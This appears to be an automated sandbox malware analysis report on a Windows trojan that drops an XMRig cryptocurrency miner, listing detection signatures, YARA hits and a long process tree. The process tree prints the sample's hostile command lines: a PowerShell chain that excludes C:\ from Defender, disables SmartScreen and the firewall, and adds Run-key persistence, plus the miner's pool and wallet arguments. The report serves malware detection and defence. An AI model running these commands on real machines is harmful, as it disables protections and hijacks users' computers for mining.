Edit tour
Windows
Analysis Report
2dOeahdsto
Overview
General Information
| Sample Name: | 2dOeahdsto (renamed file extension from none to exe) |
| Analysis ID: | 671812 |
| MD5: | a0e067202878bd30c6b2a0583982f1fd |
| SHA1: | b1bccf4a24d19c2c5626d9de0a2af042e2be66e1 |
| SHA256: | e1dcadc94c7659b12eca375e35858bf68ea02a626078dd5e41eb9bede572417c |
| Tags: | exetrojan |
| Infos: |  |
 | |
Detection
Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Creates files in the system32 config directory
May check the online IP address of the machine
Adds a directory exclusion to Windows Defender
Machine Learning detection for dropped file
Modifies the windows firewall
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Too many similar processes found
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
PE file contains more sections than normal
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Contains functionality to detect virtual machines (SLDT)
Enables security privileges
Uses taskkill to terminate processes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Classification
- System is w10x64
2dOeahdsto.exe (PID: 7136 cmdline: "C:\Users\ user\Deskt op\2dOeahd sto.exe" MD5: A0E067202878BD30C6B2A0583982F1FD) 
conhost.exe (PID: 7148 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 4016 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" C:\Program Data\UpSys .exe /SW:0 powershel l.exe $(Ad d-MpPrefer ence -Excl usionPath C:\); $(cd HKLM:\); $(New-Item Property ? ? Path $HK LM\SOFTWAR E\Policies \Microsoft \Windows\S ystem ?? N ame Enable SmartScree n -Propert yType DWor d -Value 0 ); $(Set-I temPropert y -Path $H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\mp ssvc -Name Start -Va lue 4); $( netsh advf irewall se t allprofi les state off); $(Ge t-Acl C:\P rogramData \Microsoft \Windows\S ystemData | Set-Acl C:\Program Data\Micro softNetwor k); $(New- ItemProper ty ?? Path $HKLM\SOF TWARE\Micr osoft\Wind ows\Curren tVersion\R un ?? Name WinNet -P ropertyTyp e String - Value C:\P rogramData \Microsoft Network\Sy stem.exe); $(New-Ite m -Path C: \ProgramDa ta -Name c heck.txt - ItemType f ile -Value 1); $(exi t) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 3004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
UpSys.exe (PID: 4824 cmdline: "C:\Progra mData\UpSy s.exe" /SW :0 powersh ell.exe MD5: EFE5769E37BA37CF4607CB9918639932) - UpSys.exe (PID: 4440 cmdline:
"C:\Progra mData\UpSy s.exe" /SW :0 powersh ell.exe MD5: EFE5769E37BA37CF4607CB9918639932) - UpSys.exe (PID: 6980 cmdline:
"C:\Progra mData\UpSy s.exe" /TI / /SW:0 po wershell.e xe MD5: EFE5769E37BA37CF4607CB9918639932) - powershell.exe (PID: 2200 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - netsh.exe (PID: 6756 cmdline:
"C:\Window s\system32 \netsh.exe " advfirew all set al lprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32) - Database.exe (PID: 6524 cmdline:
--url poo l.hashvaul t.pro:80 - -user 47Vt XKD1xoACvx X1aDMAmWGG ESK5kD9Eoj KZwraNVYtE 2HTwdrnhHx Pbqy7MisCE 3LHgYoJ6gG VL5GwiLxax ppNTV8zb92 a --pass x xx MD5: EAB270D7108D82EE602CE25C64A5740F) - cmd.exe (PID: 2828 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6596 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6764 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 5124 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6560 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 3476 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 6820 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6952 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6876 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - Database.exe (PID: 7152 cmdline:
--url poo l.hashvaul t.pro:80 - -user 47Vt XKD1xoACvx X1aDMAmWGG ESK5kD9Eoj KZwraNVYtE 2HTwdrnhHx Pbqy7MisCE 3LHgYoJ6gG VL5GwiLxax ppNTV8zb92 a --pass x xx MD5: EAB270D7108D82EE602CE25C64A5740F) - cmd.exe (PID: 856 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6880 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 4904 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6044 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6944 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1556 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - conhost.exe (PID: 3160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 3788 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - conhost.exe (PID: 1380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 5436 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6712 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 3392 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 2936 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - Database.exe (PID: 2108 cmdline:
--url poo l.hashvaul t.pro:80 - -user 47Vt XKD1xoACvx X1aDMAmWGG ESK5kD9Eoj KZwraNVYtE 2HTwdrnhHx Pbqy7MisCE 3LHgYoJ6gG VL5GwiLxax ppNTV8zb92 a --pass x xx MD5: EAB270D7108D82EE602CE25C64A5740F) - cmd.exe (PID: 3468 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6320 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 5068 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - cmd.exe (PID: 2704 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2316 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1760 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5196 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6264 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 7156 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5440 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6276 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6216 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5372 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6884 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 1388 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1668 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - Database.exe (PID: 5404 cmdline:
--url poo l.hashvaul t.pro:80 - -user 47Vt XKD1xoACvx X1aDMAmWGG ESK5kD9Eoj KZwraNVYtE 2HTwdrnhHx Pbqy7MisCE 3LHgYoJ6gG VL5GwiLxax ppNTV8zb92 a --pass x xx MD5: EAB270D7108D82EE602CE25C64A5740F) - cmd.exe (PID: 5680 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 2780 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 7016 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- System.exe (PID: 6648 cmdline:
"C:\Progra mData\Micr osoftNetwo rk\System. exe" MD5: A0E067202878BD30C6B2A0583982F1FD) - conhost.exe (PID: 6916 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6904 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" C:\Program Data\UpSys .exe /SW:0 powershel l.exe $(Ad d-MpPrefer ence -Excl usionPath C:\); $(cd HKLM:\); $(New-Item Property ? ? Path $HK LM\SOFTWAR E\Policies \Microsoft \Windows\S ystem ?? N ame Enable SmartScree n -Propert yType DWor d -Value 0 ); $(Set-I temPropert y -Path $H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\mp ssvc -Name Start -Va lue 4); $( netsh advf irewall se t allprofi les state off); $(Ge t-Acl C:\P rogramData \Microsoft \Windows\S ystemData | Set-Acl C:\Program Data\Micro softNetwor k); $(New- ItemProper ty ?? Path $HKLM\SOF TWARE\Micr osoft\Wind ows\Curren tVersion\R un ?? Name WinNet -P ropertyTyp e String - Value C:\P rogramData \Microsoft Network\Sy stem.exe); $(New-Ite m -Path C: \ProgramDa ta -Name c heck.txt - ItemType f ile -Value 1); $(exi t) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - UpSys.exe (PID: 6428 cmdline:
"C:\Progra mData\UpSy s.exe" /SW :0 powersh ell.exe MD5: EFE5769E37BA37CF4607CB9918639932) - netsh.exe (PID: 4864 cmdline:
"C:\Window s\system32 \netsh.exe " advfirew all set al lprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32) - cmd.exe (PID: 1348 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 3144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 1372 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - conhost.exe (PID: 6868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 7120 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 3200 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5228 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 792 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 1372 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - cmd.exe (PID: 5772 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2316 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4876 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 3448 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 728 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 1332 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 2932 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 4420 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 3044 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM Data base.exe / F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 5984 cmdline:
taskkill / IM Databas e.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 4160 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 6588 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1388 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 3788 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - cmd.exe (PID: 5384 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - Database.exe (PID: 6408 cmdline:
--url poo l.hashvaul t.pro:80 - -user 47Vt XKD1xoACvx X1aDMAmWGG ESK5kD9Eoj KZwraNVYtE 2HTwdrnhHx Pbqy7MisCE 3LHgYoJ6gG VL5GwiLxax ppNTV8zb92 a --pass x xx MD5: EAB270D7108D82EE602CE25C64A5740F) - cmd.exe (PID: 5084 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 3268 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6448 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 5856 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 6092 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Da ta\* && ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 6124 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4360 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 7176 cmdline:
"C:\Window s\System32 \cmd.exe" /K taskkil l /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 7488 cmdline:
taskkill / IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) - cmd.exe (PID: 7268 cmdline:
"C:\Window s\System32 \cmd.exe" /K del /S /Q C:\Prog ramData\Sy stemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| Click to see the 4 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth |
| |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 53 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
| |
| MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 25 entries | ||||
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Avira: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
Bitcoin Miner | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
